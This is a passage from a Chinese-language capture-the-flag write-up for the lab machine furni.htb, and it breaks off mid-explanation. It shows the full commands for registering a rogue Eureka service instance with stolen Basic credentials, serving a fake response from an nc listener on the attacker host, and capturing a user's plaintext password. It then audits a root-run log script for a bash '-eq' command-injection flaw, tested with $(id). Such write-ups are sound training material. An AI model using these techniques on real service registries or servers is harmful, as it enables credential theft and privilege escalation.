successfully<\/code><\/pre>\n<p>\u7ecf\u5206\u6790\u7814\u5224\uff0c\u8ba4\u5b9a\u9776\u673a<code>8761<\/code>\u7aef\u53e3\u3001\u5b9a\u65f6\u6267\u884c<code>miranda<\/code>\u7528\u6237\u767b\u5f55\u64cd\u4f5c\u7684\u811a\u672c<code>miranda-Login-Simulator.sh<\/code>\u548c\u65e5\u5fd7\u5206\u6790\u811a\u672c<code>log_analyse.sh<\/code>\u5b58\u5728\u63d0\u6743\u653b\u51fb\u9762\uff0c\u51b3\u5b9a\u4ece\u4ee5\u4e0a\u4e09\u70b9\u5165\u624b\u8fdb\u884c\u63d0\u6743\u64cd\u4f5c\u3002<\/p>\n<h2>\u52ab\u6301\u5fae\u670d\u52a1\u6d41\u91cf\u83b7\u53d6\u767b\u5f55\u51ed\u636e<\/h2>\n<p>\u9996\u5148\u5c1d\u8bd5\u7528\u53d1\u73b0\u7684\u51ed\u636e\u767b\u5f55\u9776\u673a<code>8761<\/code>\u7aef\u53e3<code>Web<\/code>\u670d\u52a1\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746146671050-6af8975e-2c72-44c0-82f4-68baaea54b99.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u9776\u673a<code>8761<\/code>\u7aef\u53e3\u90e8\u7f72\u4e86<code>Spring Cloud Netflix Eureka<\/code>\u5fae\u670d\u52a1\u7ba1\u7406\u7cfb\u7edf\u3002<\/p>\n<blockquote><p><code>Spring Eureka<\/code>\u662f\u4e00\u79cd\u7528\u4e8e\u5fae\u670d\u52a1\u7ba1\u7406\u7684<code>SpringBoot<\/code>\u7ec4\u4ef6\uff0c\u7528\u4e8e\u5b9e\u73b0\u5fae\u670d\u52a1\u7684\u81ea\u52a8\u6ce8\u518c\u3001\u4fee\u6539\u3001\u5220\u9664\u548c\u8def\u8d1f\u8f7d\u5747\u8861\u8bbf\u95ee\u529f\u80fd\u3002<code>Spring Eureka<\/code>\u63d0\u4f9b\u670d\u52a1\u7aef\u4e0e\u5ba2\u6237\u7aef\uff0c\u670d\u52a1\u7aef\u5373\u662f<code>Eureka<\/code>\u670d\u52a1\u6ce8\u518c\u4e2d\u5fc3\uff0c\u5ba2\u6237\u7aef\u5b8c\u6210\u5fae\u670d\u52a1\u5411<code>Eureka<\/code>\u670d\u52a1\u7684\u6ce8\u518c\u4e0e\u53d1\u73b0\u3002\u800c\u5728\u5b9e\u9645\u60c5\u51b5\u4e2d\uff0c\u7ba1\u7406\u5458\u4e5f\u53ef\u4ee5\u901a\u8fc7\u767b\u5f55<code>Spring Eureka API<\/code>\u5bf9\u5df2\u7ecf\u81ea\u52a8\u6ce8\u518c\u7684\u5fae\u670d\u52a1\u8fdb\u884c\u914d\u7f6e\u4fee\u6539\u3002<\/p><\/blockquote>\n<p>\u53ef\u4ee5\u770b\u5230\uff0c\u9776\u673a\u672c\u5730<code>8000<\/code>\u7aef\u53e3\u8fd0\u884c\u7684<code>Web<\/code>\u670d\u52a1\u5b9e\u9645\u4e0a\u662f\u4e3a\u540d\u4e3a<code>APP-GATEWAY<\/code>\u7684<code>Web<\/code>\u8def\u7531\u5e94\u7528\uff0c\u5176\u4f5c\u7528\u4e3a\u6839\u636e\u8bbf\u95ee\u7684<code>URL<\/code>\u8def\u5f84\u5c06\u8bf7\u6c42\u6d41\u91cf\u8f6c\u53d1\u81f3\u4e0d\u540c\u7684\u7aef\u53e3\uff1b<code>8001<\/code>\u548c<code>8002<\/code>\u7aef\u53e3\u624d\u662f\u771f\u6b63\u7684<code>Furni<\/code>\u5728\u7ebf\u5546\u57ce\u548c\u7528\u6237\u7ba1\u7406\u7cfb\u7edf\u3002<\/p>\n<p>\u6839\u636e\u5728\u64cd\u4f5c\u7cfb\u7edf\u4fe1\u606f\u6536\u96c6\u9636\u6bb5\u53d1\u73b0\u7684<code>miranda-Login-Simulator.sh<\/code>\u811a\u672c\u5b9a\u65f6\u5411<code>Furni<\/code>\u5728\u7ebf\u5546\u57ce\u53d1\u9001\u767b\u5f55\u8bf7\u6c42\u8fd9\u4e00\u4e8b\u5b9e\uff0c\u51b3\u5b9a\u5c1d\u8bd5\u5411<code>FURNI<\/code>\u5e94\u7528\u6ce8\u518c\u4e00\u4e2a\u6307\u5411\u653b\u51fb\u673a<code>80<\/code>\u7aef\u53e3\u7684\u6076\u610f\u5fae\u670d\u52a1\u5b9e\u4f8b\uff0c\u4ece\u800c\u5c06\u8be5\u811a\u672c\u53d1\u51fa\u767b\u5f55\u6d41\u91cf\u52ab\u6301\u5230\u653b\u51fb\u673a\u4ee5\u83b7\u53d6<code>miranda<\/code>\u7528\u6237\u7684\u767b\u5f55\u51ed\u636e\u3002<\/p>\n<p>\u9996\u5148\u67e5\u9605<code>Netflix Eureka<\/code>\u7684\u8bf4\u660e\u6587\u6863\uff1a<a href=\"https:\/\/github.com\/Netflix\/eureka\/wiki\/Eureka-REST-operations\" target=\"_blank\"  rel=\"nofollow\" >Eureka REST operations \u00b7 Netflix\/eureka Wiki<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746148588138-e7fc543c-0a0d-470c-bf7c-00804f2f9561.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u7ba1\u7406\u5458\u53ef\u4ee5\u901a\u8fc7<code>GET<\/code>\u8bbf\u95ee<code>\/eureka\/apps\/&lt;appname&gt;<\/code>\u63a5\u53e3\u7684\u65b9\u5f0f\u83b7\u53d6\u6307\u5b9a\u5fae\u670d\u52a1\u5e94\u7528\u7684\u5b9e\u4f8b\u914d\u7f6e\u4fe1\u606f\uff0c\u8fd8\u53ef\u4ee5\u901a\u8fc7<code>POST<\/code>\u8bf7\u6c42\u8be5\u63a5\u53e3\u65b0\u589e\u4e00\u4e2a\u5b9e\u4f8b\u914d\u7f6e\u3002\u6211\u4eec\u8bbf\u95ee<code>http:\/\/furni.htb:8761\/eureka\/apps\/FURNI<\/code>\u63a5\u53e3\uff0c\u83b7\u53d6<code>Furni<\/code>\u5728\u7ebf\u5546\u57ce\u7684\u5fae\u670d\u52a1\u914d\u7f6e\uff1a<\/p>\n<pre><code class=\"language-xml\">&lt;application&gt;\n  &lt;name&gt;FURNI&lt;\/name&gt;\n  &lt;instance&gt;\n    &lt;instanceId&gt;localhost:Furni:8082&lt;\/instanceId&gt;\n    &lt;hostName&gt;localhost&lt;\/hostName&gt;\n    &lt;app&gt;FURNI&lt;\/app&gt;\n    &lt;ipAddr&gt;10.10.11.66&lt;\/ipAddr&gt;\n    &lt;status&gt;UP&lt;\/status&gt;\n    &lt;overriddenstatus&gt;UNKNOWN&lt;\/overriddenstatus&gt;\n    &lt;port enabled=\"true\"&gt;8082&lt;\/port&gt;\n    &lt;securePort enabled=\"false\"&gt;443&lt;\/securePort&gt;\n    &lt;countryId&gt;1&lt;\/countryId&gt;\n    &lt;dataCenterInfo class=\"com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo\"&gt;\n      &lt;name&gt;MyOwn&lt;\/name&gt;\n    &lt;\/dataCenterInfo&gt;\n    &lt;leaseInfo&gt;\n      &lt;renewalIntervalInSecs&gt;30&lt;\/renewalIntervalInSecs&gt;\n      &lt;durationInSecs&gt;90&lt;\/durationInSecs&gt;\n      &lt;registrationTimestamp&gt;1746141792036&lt;\/registrationTimestamp&gt;\n      &lt;lastRenewalTimestamp&gt;1746148869868&lt;\/lastRenewalTimestamp&gt;\n      &lt;evictionTimestamp&gt;0&lt;\/evictionTimestamp&gt;\n      &lt;serviceUpTimestamp&gt;1746141792036&lt;\/serviceUpTimestamp&gt;\n    &lt;\/leaseInfo&gt;\n    &lt;metadata&gt;\n      &lt;management.port&gt;8082&lt;\/management.port&gt;\n    &lt;\/metadata&gt;\n    &lt;homePageUrl&gt;http:\/\/localhost:8082\/&lt;\/homePageUrl&gt;\n    &lt;statusPageUrl&gt;http:\/\/localhost:8082\/actuator\/info&lt;\/statusPageUrl&gt;\n    &lt;healthCheckUrl&gt;http:\/\/localhost:8082\/actuator\/health&lt;\/healthCheckUrl&gt;\n    &lt;vipAddress&gt;Furni&lt;\/vipAddress&gt;\n    &lt;secureVipAddress&gt;Furni&lt;\/secureVipAddress&gt;\n    &lt;isCoordinatingDiscoveryServer&gt;false&lt;\/isCoordinatingDiscoveryServer&gt;\n    &lt;lastUpdatedTimestamp&gt;1746141792036&lt;\/lastUpdatedTimestamp&gt;\n    &lt;lastDirtyTimestamp&gt;1746141791516&lt;\/lastDirtyTimestamp&gt;\n    &lt;actionType&gt;ADDED&lt;\/actionType&gt;\n  &lt;\/instance&gt;\n&lt;\/application&gt;<\/code><\/pre>\n<p>\u968f\u540e\u6839\u636e\u8fd4\u56de\u7684<code>XML<\/code>\u914d\u7f6e\uff0c\u7f16\u5199\u5982\u4e0b<code>JSON<\/code>\u683c\u5f0f\u7684\u6076\u610f\u5fae\u670d\u52a1\u914d\u7f6e\uff0c\u5c06\u5b9e\u4f8b\u5730\u5740\u6307\u5411\u653b\u51fb\u673a<code>80<\/code>\u7aef\u53e3\uff0c\u4fdd\u5b58\u4e3a<code>evil-instance.json<\/code>\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-json\">{\"instance\":{\"instanceId\":\"10.10.14.2:misaka19008:80\",\"app\":\"FURNI\",\"appGroupName\":null,\"ipAddr\":\"10.10.14.2\",\"sid\":\"na\",\"homePageUrl\":\"http:\/\/localhost:8082\/\",\"statusPageUrl\":\"http:\/\/localhost:8082\/actuator\/info\",\"healthCheckUrl\":\"http:\/\/localhost:8082\/actuator\/health\",\"secureHealthCheckUrl\":null,\"vipAddress\":\"Furni\",\"secureVipAddress\":\"Furni\",\"countryId\":1,\"dataCenterInfo\":{\"@class\":\"com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo\",\"name\":\"MyOwn\"},\"hostName\":\"10.10.14.2\",\"status\":\"UP\",\"overriddenStatus\":\"UNKNOWN\",\"leaseInfo\":{\"renewalIntervalInSecs\":30,\"durationInSecs\":90,\"registrationTimestamp\":0,\"lastRenewalTimestamp\":0,\"evictionTimestamp\":0,\"serviceUpTimestamp\":0},\"isCoordinatingDiscoveryServer\":false,\"lastUpdatedTimestamp\":1630906180645,\"lastDirtyTimestamp\":1630906182808,\"actionType\":null,\"asgName\":null,\"port\":{\"$\":80,\"@enabled\":\"true\"},\"securePort\":{\"$\":443,\"@enabled\":\"false\"},\"metadata\":{\"management.port\":\"8082\"}}}<\/code><\/pre>\n<p>\u63a5\u7740\u7f16\u5199\u4e00\u4e2a<code>HTTP<\/code>\u54cd\u5e94\u6570\u636e\u5305<code>response_heartbeat.data<\/code>\uff0c\u7528\u4e8e\u5145\u5f53\u5fae\u670d\u52a1\u7684\u5fc3\u8df3\u5305\u54cd\u5e94\u6570\u636e\uff1a<\/p>\n<pre><code class=\"language-plain\">HTTP\/1.1 200 OK\nContent-Type: text\/html\nContent-Length: 38\n\n&lt;script&gt;alert(\"misaka19008\");&lt;\/script&gt;<\/code><\/pre>\n<p>\u7f16\u5199\u5b8c\u6210\u540e\uff0c\u5c31\u53ef\u4ee5\u4f7f\u7528<code>netcat<\/code>\u5de5\u5177\u76d1\u542c<code>80<\/code>\u7aef\u53e3\uff0c\u628a<code>response_heartbeat.data<\/code>\u6587\u4ef6\u5185\u5bb9\u91cd\u5b9a\u5411\u81f3\u8f93\u5165\u6d41\u4e86\uff1a<\/p>\n<pre><code class=\"language-shell\">nc -l -p 80 -s 10.10.14.2 &lt; response_heartbeat.data<\/code><\/pre>\n<p>\u7136\u540e\u4f7f\u7528<code>curl<\/code>\u5de5\u5177\uff0c\u5411<code>\/eureka\/apps\/FURNI<\/code>\u7aef\u70b9\u53d1\u9001\u6076\u610f\u5b9e\u4f8b\u6ce8\u518c\u8bf7\u6c42\uff1a<\/p>\n<pre><code class=\"language-shell\">curl -v http:\/\/furni.htb:8761\/eureka\/apps\/FURNI -X POST -d @evil-instance.json -H \"Content-Type: application\/json\" -H \"Authorization: Basic RXVyZWthU3J2cjowc2NhclBXRGlzVGhlQjNzdA==\"<\/code><\/pre>\n<p>\u63a5\u7740\u5982\u6cd5\u70ae\u5236\uff0c\u5411<code>APP-GATEWAY<\/code>\u548c<code>USER-MANAGEMENT-SERVICE<\/code>\u5e94\u7528\u6dfb\u52a0\u6076\u610f\u5b9e\u4f8b\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746151364552-067f1dd6-dddd-4c65-92d7-e82f21ba90cd.png\" alt=\"\" \/><\/p>\n<p>\u6700\u540e\u5237\u65b0<code>Spring Cloud Eureka<\/code>\u7684\u63a7\u5236\u9762\u677f\u4e3b\u9875\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746155861399-5dd63875-78a2-4e4c-8dc5-ab5e33b76f2a.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u6ce8\u518c\u6076\u610f\u5b9e\u4f8b\u3002\u7b49\u5f85\u4e00\u4f1a\u513f\u540e\uff0c\u53d1\u73b0\u767b\u5f55\u8bf7\u6c42\u5df2\u7ecf\u88ab\u52ab\u6301\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746155913271-8df6154c-7260-4a9a-8329-2feb0b577e6d.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u5982\u4e0b\u767b\u5f55\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u7528\u6237\u540d\uff1a<code>miranda@furni.htb<\/code>\u3001<code>miranda-wise<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>IL!veT0Be&amp;BeT0L0ve<\/code><\/li>\n<\/ul>\n<p>\u5c1d\u8bd5\u767b\u5f55<code>SSH<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746156132842-f5a36619-247f-4712-b005-1ce5f11b62dd.png\" alt=\"\" \/><\/p>\n<p><strong>\u6210\u529f\uff01\uff01<\/strong><\/p>\n<h2>\u5b9a\u65f6\u811a\u672c\u6bd4\u8f83\u8fd0\u7b97\u7b26\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u767b\u5f55<code>miranda-wise<\/code>\u7528\u6237\u540e\uff0c\u91cd\u65b0\u8fdb\u884c\u76ee\u5f55\u4fe1\u606f\u6536\u96c6\uff0c\u53d1\u73b0\u5f53\u524d\u7528\u6237\u5728<code>developers<\/code>\u7ec4\u5185\uff0c\u800c\u4e24\u4efd<code>Web<\/code>\u670d\u52a1\u65e5\u5fd7\u6587\u4ef6<code>application.log<\/code>\u6240\u5728\u76ee\u5f55<code>\/var\/www\/web\/cloud-gateway\/log\/<\/code>\u548c<code>\/var\/www\/web\/user-management-service\/log\/<\/code>\u7684<code>GID<\/code>\u4e5f\u4e3a<code>developers<\/code>\uff0c\u4e14\u6743\u9650\u4e3a<code>775<\/code>\uff0c\u8fd9\u610f\u5473\u7740\u6211\u4eec\u53ef\u4ee5\u5bf9\u4e24\u4efd\u65e5\u5fd7\u6587\u4ef6\u8fdb\u884c<strong>\u5148\u5220\u9664\u540e\u91cd\u65b0\u521b\u5efa<\/strong>\u7684\u64cd\u4f5c\uff0c\u4ee5\u8fbe\u5230\u4fee\u6539\u6587\u4ef6\u7684\u76ee\u7684\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746159414663-68d717d7-ad54-43e3-90b9-58ca52905fca.png\" alt=\"\" \/><\/p>\n<p>\u6839\u636e\u64cd\u4f5c\u7cfb\u7edf\u4fe1\u606f\u6536\u96c6\u7684\u7ed3\u679c\uff0c\u53ef\u5f97\u77e5<code>root<\/code>\u7528\u6237\u6bcf\u6b21\u6267\u884c<code>curl<\/code>\u8fdb\u884c\u767b\u5f55\u64cd\u4f5c\u4e4b\u540e\uff0c\u4f1a\u8c03\u7528<code>\/opt\/log_analyse.sh<\/code>\u811a\u672c\u5bf9\u4e24\u4efd<code>Web<\/code>\u5e94\u7528\u65e5\u5fd7\u8fdb\u884c\u4e00\u4e9b\u64cd\u4f5c\uff0c\u5224\u65ad<code>log_analyse.sh<\/code>\u5b9a\u65f6\u811a\u672c\u4e3a\u91cd\u5927\u63d0\u6743\u653b\u51fb\u5411\u91cf\uff0c\u4e0b\u9762\u8fdb\u884c\u4ee3\u7801\u5ba1\u8ba1\uff1a<\/p>\n<pre><code class=\"language-bash\">\n#!\/bin\/bash\n\n# Colors\nGREEN=&#39;\\033[0;32m&#39;\nRED=&#39;\\033[0;31m&#39;\nYELLOW=&#39;\\033[1;33m&#39;\nBLUE=&#39;\\033[0;34m&#39;\nCYAN=&#39;\\033[0;36m&#39;\nRESET=&#39;\\033[0m&#39;\n\nLOG_FILE=&quot;$1&quot;\nOUTPUT_FILE=&quot;log_analysis.txt&quot;\n\ndeclare -A successful_users  # Associative array: username -&gt; count\ndeclare -A failed_users      # Associative array: username -&gt; count\nSTATUS_CODES=(&quot;200:0&quot; &quot;201:0&quot; &quot;302:0&quot; &quot;400:0&quot; &quot;401:0&quot; &quot;403:0&quot; &quot;404:0&quot; &quot;500:0&quot;) # Indexed array: &quot;code:count&quot; pairs\n\nif [ ! -f &quot;$LOG_FILE&quot; ]; then\n    echo -e &quot;${RED}Error: Log file $LOG_FILE not found.${RESET}&quot;\n    exit 1\nfi\n\n\nanalyze_logins() {\n    # Process successful logins\n    while IFS= read -r line; do\n        username=$(echo &quot;$line&quot; | awk -F&quot;&#39;&quot; &#39;{print $2}&#39;)\n        if [ -n &quot;${successful_users[$username]+_}&quot; ]; then\n            successful_users[$username]=$((successful_users[$username] + 1))\n        else\n            successful_users[$username]=1\n        fi\n    done &lt; &lt;(grep &quot;LoginSuccessLogger&quot; &quot;$LOG_FILE&quot;)\n\n    # Process failed logins\n    while IFS= read -r line; do\n        username=$(echo &quot;$line&quot; | awk -F&quot;&#39;&quot; &#39;{print $2}&#39;)\n        if [ -n &quot;${failed_users[$username]+_}&quot; ]; then\n            failed_users[$username]=$((failed_users[$username] + 1))\n        else\n            failed_users[$username]=1\n        fi\n    done &lt; &lt;(grep &quot;LoginFailureLogger&quot; &quot;$LOG_FILE&quot;)\n}\n\n\nanalyze_http_statuses() {\n    # Process HTTP status codes\n    while IFS= read -r line; do\n        code=$(echo &quot;$line&quot; | grep -oP &#39;Status: \\K.*&#39;)\n        found=0\n        # Check if code exists in STATUS_CODES array\n        for i in &quot;${!STATUS_CODES[@]}&quot;; do\n            existing_entry=&quot;${STATUS_CODES[$i]}&quot;\n            existing_code=$(echo &quot;$existing_entry&quot; | cut -d&#39;:&#39; -f1)\n            existing_count=$(echo &quot;$existing_entry&quot; | cut -d&#39;:&#39; -f2)\n            if [[ &quot;$existing_code&quot; -eq &quot;$code&quot; ]]; then\n                new_count=$((existing_count + 1))\n                STATUS_CODES[$i]=&quot;${existing_code}:${new_count}&quot;\n                break\n            fi\n        done\n    done &lt; &lt;(grep &quot;HTTP.*Status: &quot; &quot;$LOG_FILE&quot;)\n}\n\n\nanalyze_log_errors(){\n     # Log Level Counts (colored)\n    echo -e &quot;\\n${YELLOW}[+] Log Level Counts:${RESET}&quot;\n    log_levels=$(grep -oP &#39;(?&lt;=Z  )\\w+&#39; &quot;$LOG_FILE&quot; | sort | uniq -c)\n    echo &quot;$log_levels&quot; | awk -v blue=&quot;$BLUE&quot; -v yellow=&quot;$YELLOW&quot; -v red=&quot;$RED&quot; -v reset=&quot;$RESET&quot; &#39;{\n        if ($2 == &quot;INFO&quot;) color=blue;\n        else if ($2 == &quot;WARN&quot;) color=yellow;\n        else if ($2 == &quot;ERROR&quot;) color=red;\n        else color=reset;\n        printf &quot;%s%6s %s%s\\n&quot;, color, $1, $2, reset\n    }&#39;\n\n    # ERROR Messages\n    error_messages=$(grep &#39; ERROR &#39; &quot;$LOG_FILE&quot; | awk -F&#39; ERROR &#39; &#39;{print $2}&#39;)\n    echo -e &quot;\\n${RED}[+] ERROR Messages:${RESET}&quot;\n    echo &quot;$error_messages&quot; | awk -v red=&quot;$RED&quot; -v reset=&quot;$RESET&quot; &#39;{print red $0 reset}&#39;\n\n    # Eureka Errors\n    eureka_errors=$(grep &#39;Connect to http:\/\/localhost:8761.*failed: Connection refused&#39; &quot;$LOG_FILE&quot;)\n    eureka_count=$(echo &quot;$eureka_errors&quot; | wc -l)\n    echo -e &quot;\\n${YELLOW}[+] Eureka Connection Failures:${RESET}&quot;\n    echo -e &quot;${YELLOW}Count: $eureka_count${RESET}&quot;\n    echo &quot;$eureka_errors&quot; | tail -n 2 | awk -v yellow=&quot;$YELLOW&quot; -v reset=&quot;$RESET&quot; &#39;{print yellow $0 reset}&#39;\n}\n\n\ndisplay_results() {\n    echo -e &quot;${BLUE}----- Log Analysis Report -----${RESET}&quot;\n\n    # Successful logins\n    echo -e &quot;\\n${GREEN}[+] Successful Login Counts:${RESET}&quot;\n    total_success=0\n    for user in &quot;${!successful_users[@]}&quot;; do\n        count=${successful_users[$user]}\n        printf &quot;${GREEN}%6s %s${RESET}\\n&quot; &quot;$count&quot; &quot;$user&quot;\n        total_success=$((total_success + count))\n    done\n    echo -e &quot;${GREEN}\\nTotal Successful Logins: $total_success${RESET}&quot;\n\n    # Failed logins\n    echo -e &quot;\\n${RED}[+] Failed Login Attempts:${RESET}&quot;\n    total_failed=0\n    for user in &quot;${!failed_users[@]}&quot;; do\n        count=${failed_users[$user]}\n        printf &quot;${RED}%6s %s${RESET}\\n&quot; &quot;$count&quot; &quot;$user&quot;\n        total_failed=$((total_failed + count))\n    done\n    echo -e &quot;${RED}\\nTotal Failed Login Attempts: $total_failed${RESET}&quot;\n\n    # HTTP status codes\n    echo -e &quot;\\n${CYAN}[+] HTTP Status Code Distribution:${RESET}&quot;\n    total_requests=0\n    # Sort codes numerically\n    IFS=$&#39;\\n&#39; sorted=($(sort -n -t&#39;:&#39; -k1 &lt;&lt;&lt;&quot;${STATUS_CODES[*]}&quot;))\n    unset IFS\n    for entry in &quot;${sorted[@]}&quot;; do\n        code=$(echo &quot;$entry&quot; | cut -d&#39;:&#39; -f1)\n        count=$(echo &quot;$entry&quot; | cut -d&#39;:&#39; -f2)\n        total_requests=$((total_requests + count))\n        \n        # Color coding\n        if [[ $code =~ ^2 ]]; then color=&quot;$GREEN&quot;\n        elif [[ $code =~ ^3 ]]; then color=&quot;$YELLOW&quot;\n        elif [[ $code =~ ^4 || $code =~ ^5 ]]; then color=&quot;$RED&quot;\n        else color=&quot;$CYAN&quot;\n        fi\n        \n        printf &quot;${color}%6s %s${RESET}\\n&quot; &quot;$count&quot; &quot;$code&quot;\n    done\n    echo -e &quot;${CYAN}\\nTotal HTTP Requests Tracked: $total_requests${RESET}&quot;\n}\n\n\n# Main execution\nanalyze_logins\nanalyze_http_statuses\ndisplay_results | tee &quot;$OUTPUT_FILE&quot;\nanalyze_log_errors | tee -a &quot;$OUTPUT_FILE&quot;\necho -e &quot;\\n${GREEN}Analysis completed. Results saved to $OUTPUT_FILE${RESET}&quot;\n<\/code><\/pre>\n<p>\u53ef\u4ee5\u53d1\u73b0\u8be5\u811a\u672c\u7684\u4e3b\u8981\u529f\u80fd\u662f\u5bf9\u65e5\u5fd7\u5185\u7684\u7528\u6237\u767b\u5f55\u8bb0\u5f55\u548c\u72b6\u6001\u7801\u8fdb\u884c\u7edf\u8ba1\u6c47\u603b\uff0c\u5e76\u7531<code>4<\/code>\u4e2a\u51fd\u6570\u5b9e\u73b0\uff0c\u4e0b\u9762\u5bf9\u5176\u8fdb\u884c\u9010\u4e2a\u5206\u6790\u3002<\/p>\n<p>\u9996\u5148\u5206\u6790<code>analyze_logins()<\/code>\u51fd\u6570\uff1a\u8be5\u51fd\u6570\u5148\u4f7f\u7528\u4e86<code>grep<\/code>\u547d\u4ee4\uff0c\u5c06\u65e5\u5fd7\u6587\u4ef6\u4e2d\u5e26\u6709<code>LoginSuccessLogger<\/code>\u5b57\u7b26\u4e32\u7684\u6587\u672c\u884c\u4f20\u5165\u4e86\u5904\u7406\u65e5\u5fd7\u7684\u5faa\u73af\u5757\u4e2d\uff1b\u5faa\u73af\u5757\u4f7f\u7528<code>awk<\/code>\u547d\u4ee4\uff0c\u628a\u4f20\u5165\u7684\u6bcf\u884c\u5185\u5bb9\u6839\u636e<code>'<\/code>\u53f7\u8fdb\u884c\u5206\u5272\uff0c\u8fd4\u56de\u5206\u5272\u540e\u5b57\u7b26\u4e32\u6570\u7ec4\u7684\u7b2c\u4e8c\u4e2a\u5143\u7d20\uff08\u5373\u7528\u6237\u540d\uff09\uff0c\u968f\u540e\u5224\u65ad\u8be5\u7528\u6237\u662f\u5426\u5df2\u7ecf\u88ab\u8bb0\u5f55\u5230\u4e86<code>successful_user<\/code>\u6570\u7ec4\u5185\uff0c\u82e5\u672a\u8bb0\u5f55\u5219\u521b\u5efa\u65b0\u5143\u7d20\u8bb0\u5f55\uff0c\u82e5\u5df2\u8bb0\u5f55\u5219\u5c06\u5176\u6210\u529f\u6b21\u6570\u52a0<code>1<\/code>\u3002\u767b\u5f55\u5931\u8d25\u7528\u6237\u540c\u7406\u3002\u7531\u4e8e\u4f20\u5165\u884c<code>line<\/code>\u548c<code>username<\/code>\u53d8\u91cf\u5747\u88ab\u5f15\u53f7\u5305\u88f9\uff0c\u672a\u53d1\u73b0\u53ef\u5229\u7528\u70b9\u3002<\/p>\n<p>\u63a5\u7740\u5206\u6790<code>analyze_http_statuses()<\/code>\u51fd\u6570\uff1a\u8be5\u51fd\u6570\u5148\u4f7f\u7528<code>grep<\/code>\u547d\u4ee4\uff0c\u5c06\u65e5\u5fd7\u6587\u4ef6\u4e2d\u5e26\u6709<code>HTTP Status<\/code>\u5b57\u7b26\u4e32\u7684\u884c\u4f20\u5165\u5faa\u73af\u5757\u4e2d\uff0c\u968f\u540e\u5faa\u73af\u5757\u518d\u6b21\u4f7f\u7528<code>grep<\/code>\u547d\u4ee4\u628a<code>HTTP Status:<\/code>\u540e\u7684<code>HTTP<\/code>\u6570\u5b57\u72b6\u6001\u7801\u63d0\u53d6\u51fa\u6765\uff0c\u8d4b\u503c\u7ed9<code>code<\/code>\u53d8\u91cf\uff0c\u63a5\u7740\u904d\u5386<code>STATUS_CODE<\/code>\u6570\u7ec4\uff0c<strong><span style=\"color: #df2a3f; background-color: #fbde28;\">\u4f7f\u7528-eq<\/span><\/strong><strong><span style=\"color: #df2a3f; background-color: #fbde28;\">\u6570\u503c\u8fd0\u7b97\u7b26\u5c06\u8be5\u72b6\u6001\u7801\u548c\u9884\u5b9a\u4e49\u7684\u72b6\u6001\u7801\u8fdb\u884c\u6bd4\u8f83<\/span><\/strong><span style=\"background-color: rgba(255, 255, 255, 0);\">\uff0c\u800c\u5728\u8fd9\u91cc\uff0c\u6f0f\u6d1e\u51fa\u73b0\u4e86\u3002<\/span><\/p>\n<p><span style=\"background-color: rgba(255, 255, 255, 0);\">\u5728<\/span><code>Linux Bash<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\">\u4e2d\uff0c<\/span><code>-eq<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\">\u8fd0\u7b97\u7b26\u7684\u4f5c\u7528\u662f<\/span><strong><span style=\"background-color: rgba(255, 255, 255, 0);\">\u5224\u65ad\u4e24\u4e2a\u6570\u5b57\u662f\u5426\u76f8\u7b49<\/span><\/strong><span style=\"background-color: rgba(255, 255, 255, 0);\">\u3002\u5b83\u7684\u7528\u6cd5\u5982\u4e0b\uff1a<\/span><\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\nread -rp \"Enter guess: \" num\nif [[ $num -eq 42 ]]\nthen\n  echo \"Correct\"\nelse\n  echo \"Wrong\"\nfi<\/code><\/pre>\n<p><span style=\"background-color: rgba(255, 255, 255, 0);\">\u663e\u800c\u6613\u89c1\uff0c\u5728\u4e00\u822c\u60c5\u51b5\u4e0b\uff0c\u6211\u4eec\u5982\u679c\u8f93\u5165<\/span><code>42<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\">\uff0c\u811a\u672c\u4f1a\u6253\u5370<\/span><code>Correct<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\">\uff0c\u5426\u5219\u5c31\u4f1a\u6253\u5370<\/span><code>Wrong<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\">\u3002\u6211\u4eec\u5982\u679c\u8bd5\u56fe\u8f93\u5165\u547d\u4ee4\u66ff\u6362\u53d8\u91cf\uff0c\u811a\u672c\u5c31\u4f1a\u62a5\u9519\u9000\u51fa\uff1a<\/span><\/p>\n<pre><code class=\"language-plain\">.\/test.sh: \u884c 3: [[: $(id): \u8bed\u6cd5\u9519\u8bef\uff1a\u9700\u8981\u64cd\u4f5c\u6570\uff08\u9519\u8bef\u8bb0\u53f7\u662f \"$(id)\"\uff09<\/code><\/pre>\n<p><span style=\"background-color: rgba(255, 255, 255, 0);\">\u6b64\u65f6\uff0c\u7531\u4e8e<\/span><code>Linux Bash<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\">\u662f\u4e00\u79cd\u811a\u672c\u8bed\u8a00\uff0c\u8be5\u811a\u672c\u5e76\u4e0d\u662f\u5c06\u4e00\u4e2a\u6570\u503c\u6216\u5b57\u7b26\u4e32\u540c\u53c2\u6570<\/span><code>42<\/code><span style=\"background-color: rgba(255, 255, 255, 